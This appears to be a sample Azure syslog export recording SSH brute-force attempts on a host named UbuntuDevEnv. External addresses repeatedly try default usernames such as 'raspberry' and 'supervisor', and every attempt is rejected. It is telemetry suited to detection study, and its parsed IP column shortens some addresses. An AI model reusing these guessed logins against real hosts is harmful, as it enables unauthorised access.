+12547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:50,UbuntuDevEnv,2019-06-26 03:42:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:50,UbuntuDevEnv,2019-06-26 03:42:49,auth,UbuntuDevEnv,info,Failed password for invalid user raspberry from 45.122.222.193 port 36564 ssh2,116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,45.122.222.1,36564,,
+12549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:50,UbuntuDevEnv,2019-06-26 03:42:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:52,UbuntuDevEnv,2019-06-26 03:42:51,auth,UbuntuDevEnv,info,Failed password for invalid user mc from 118.24.131.236 port 35134 ssh2,116843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mc,118.24.131.2,35134,,
+12551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:52,UbuntuDevEnv,2019-06-26 03:42:52,auth,UbuntuDevEnv,info,Failed password for invalid user raspberry from 45.122.222.193 port 36564 ssh2,116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,45.122.222.1,36564,,
+12552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:52,UbuntuDevEnv,2019-06-26 03:42:52,auth,UbuntuDevEnv,info,Disconnected from invalid user mc 118.24.131.236 port 35134 [preauth],116843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mc,118.24.131.2,35134,,
+12553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:52,UbuntuDevEnv,2019-06-26 03:42:52,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 35134:11: Bye Bye [preauth],116843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,35134,,
+12554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:52,UbuntuDevEnv,2019-06-26 03:42:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:54,UbuntuDevEnv,2019-06-26 03:42:53,auth,UbuntuDevEnv,info,Failed password for invalid user raspberry from 45.122.222.193 port 36564 ssh2,116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,45.122.222.1,36564,,
+12556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:54,UbuntuDevEnv,2019-06-26 03:42:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:56,UbuntuDevEnv,2019-06-26 03:42:55,auth,UbuntuDevEnv,info,Failed password for invalid user raspberry from 45.122.222.193 port 36564 ssh2,116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,45.122.222.1,36564,,
+12558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:56,UbuntuDevEnv,2019-06-26 03:42:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:58,UbuntuDevEnv,2019-06-26 03:42:58,auth,UbuntuDevEnv,info,Failed password for invalid user raspberry from 45.122.222.193 port 36564 ssh2,116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,45.122.222.1,36564,,
+12560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:58,UbuntuDevEnv,2019-06-26 03:42:58,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+12561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:58,UbuntuDevEnv,2019-06-26 03:42:58,auth,UbuntuDevEnv,info,Disconnecting invalid user raspberry 45.122.222.193 port 36564: Too many authentication failures [preauth],116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,45.122.222.1,36564,,
+12562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:58,UbuntuDevEnv,2019-06-26 03:42:58,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:58,UbuntuDevEnv,2019-06-26 03:42:58,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user raspberry from 45.122.222.193 port 36564 ssh2 [preauth],116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,45.122.222.1,36564,,
+12564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:08,UbuntuDevEnv,2019-06-26 03:43:07,auth,UbuntuDevEnv,info,Invalid user raspberry from 45.122.222.193 port 38197,116915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,45.122.222.1,38197,,
+12565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:08,UbuntuDevEnv,2019-06-26 03:43:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:08,UbuntuDevEnv,2019-06-26 03:43:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:10,UbuntuDevEnv,2019-06-26 03:43:10,auth,UbuntuDevEnv,info,Failed password for invalid user raspberry from 45.122.222.193 port 38197 ssh2,116915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,45.122.222.1,38197,,
+12568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:10,UbuntuDevEnv,2019-06-26 03:43:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:12,UbuntuDevEnv,2019-06-26 03:43:11,auth,UbuntuDevEnv,info,Failed password for invalid user raspberry from 45.122.222.193 port 38197 ssh2,116915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,45.122.222.1,38197,,
+12570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:12,UbuntuDevEnv,2019-06-26 03:43:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:14,UbuntuDevEnv,2019-06-26 03:43:13,auth,UbuntuDevEnv,info,Failed password for invalid user raspberry from 45.122.222.193 port 38197 ssh2,116915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,45.122.222.1,38197,,
+12572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:14,UbuntuDevEnv,2019-06-26 03:43:13,auth,UbuntuDevEnv,info,Disconnected from invalid user raspberry 45.122.222.193 port 38197 [preauth],116915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,45.122.222.1,38197,,
+12573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:14,UbuntuDevEnv,2019-06-26 03:43:13,auth,UbuntuDevEnv,info,Received disconnect from 45.122.222.193 port 38197:11: Bye Bye [preauth],116915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.122.222.1,38197,,
+12574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:14,UbuntuDevEnv,2019-06-26 03:43:13,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:16,UbuntuDevEnv,2019-06-26 03:43:15,auth,UbuntuDevEnv,info,Invalid user supervisor from 45.122.222.193 port 38848,116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,45.122.222.1,38848,,
+12576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:16,UbuntuDevEnv,2019-06-26 03:43:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:16,UbuntuDevEnv,2019-06-26 03:43:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:16,UbuntuDevEnv,2019-06-26 03:43:16,auth,UbuntuDevEnv,info,Invalid user juliette from 43.242.215.70 port 22507,116953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,juliette,43.242.215.7,22507,,
+12579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:16,UbuntuDevEnv,2019-06-26 03:43:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:16,UbuntuDevEnv,2019-06-26 03:43:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,116953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:18,UbuntuDevEnv,2019-06-26 03:43:17,auth,UbuntuDevEnv,info,Failed password for invalid user supervisor from 45.122.222.193 port 38848 ssh2,116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,45.122.222.1,38848,,
+12582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:18,UbuntuDevEnv,2019-06-26 03:43:17,auth,UbuntuDevEnv,info,Failed password for invalid user juliette from 43.242.215.70 port 22507 ssh2,116953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,juliette,43.242.215.7,22507,,
+12583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:18,UbuntuDevEnv,2019-06-26 03:43:17,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 22507:11: Bye Bye [preauth],116953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,22507,,
+12584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:18,UbuntuDevEnv,2019-06-26 03:43:17,auth,UbuntuDevEnv,info,Disconnected from invalid user juliette 43.242.215.70 port 22507 [preauth],116953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,juliette,43.242.215.7,22507,,
+12585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:18,UbuntuDevEnv,2019-06-26 03:43:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:20,UbuntuDevEnv,2019-06-26 03:43:19,auth,UbuntuDevEnv,info,Failed password for invalid user supervisor from 45.122.222.193 port 38848 ssh2,116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,45.122.222.1,38848,,
+12587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:20,UbuntuDevEnv,2019-06-26 03:43:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:22,UbuntuDevEnv,2019-06-26 03:43:22,auth,UbuntuDevEnv,info,Failed password for invalid user supervisor from 45.122.222.193 port 38848 ssh2,116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,45.122.222.1,38848,,
+12589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:23,UbuntuDevEnv,2019-06-26 03:43:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:24,UbuntuDevEnv,2019-06-26 03:43:24,auth,UbuntuDevEnv,info,Failed password for invalid user supervisor from 45.122.222.193 port 38848 ssh2,116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,45.122.222.1,38848,,
+12591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:24,UbuntuDevEnv,2019-06-26 03:43:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:26,UbuntuDevEnv,2019-06-26 03:43:26,auth,UbuntuDevEnv,info,Failed password for invalid user supervisor from 45.122.222.193 port 38848 ssh2,116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,45.122.222.1,38848,,
+12593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:27,UbuntuDevEnv,2019-06-26 03:43:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:29,UbuntuDevEnv,2019-06-26 03:43:28,auth,UbuntuDevEnv,info,Failed password for invalid user supervisor from 45.122.222.193 port 38848 ssh2,116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,45.122.222.1,38848,,
+12595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:29,UbuntuDevEnv,2019-06-26 03:43:28,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+12596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:29,UbuntuDevEnv,2019-06-26 03:43:28,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user supervisor from 45.122.222.193 port 38848 ssh2 [preauth],116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,45.122.222.1,38848,,
+12597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:29,UbuntuDevEnv,2019-06-26 03:43:28,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:29,UbuntuDevEnv,2019-06-26 03:43:28,auth,UbuntuDevEnv,info,Disconnecting invalid user supervisor 45.122.222.193 port 38848: Too many authentication failures [preauth],116945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,45.122.222.1,38848,,
+12599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:38,UbuntuDevEnv,2019-06-26 03:43:38,auth,UbuntuDevEnv,info,Invalid user supervisor from 45.122.222.193 port 40560,117022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,45.122.222.1,40560,,
+12600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:38,UbuntuDevEnv,2019-06-26 03:43:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:38,UbuntuDevEnv,2019-06-26 03:43:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,117022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:41,UbuntuDevEnv,2019-06-26 03:43:40,auth,UbuntuDevEnv,info,Failed password for invalid user supervisor from 45.122.222.193 port 40560 ssh2,117022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,45.122.222.1,40560,,
+12603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:41,UbuntuDevEnv,2019-06-26 03:43:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:43,UbuntuDevEnv,2019-06-26 03:43:42,auth,UbuntuDevEnv,info,Failed password for invalid user supervisor from 45.122.222.193 port 40560 ssh2,117022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,45.122.222.1,40560,,
+12605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:43,UbuntuDevEnv,2019-06-26 03:43:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:45,UbuntuDevEnv,2019-06-26 03:43:45,auth,UbuntuDevEnv,info,Failed password for invalid user supervisor from 45.122.222.193 port 40560 ssh2,117022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,45.122.222.1,40560,,
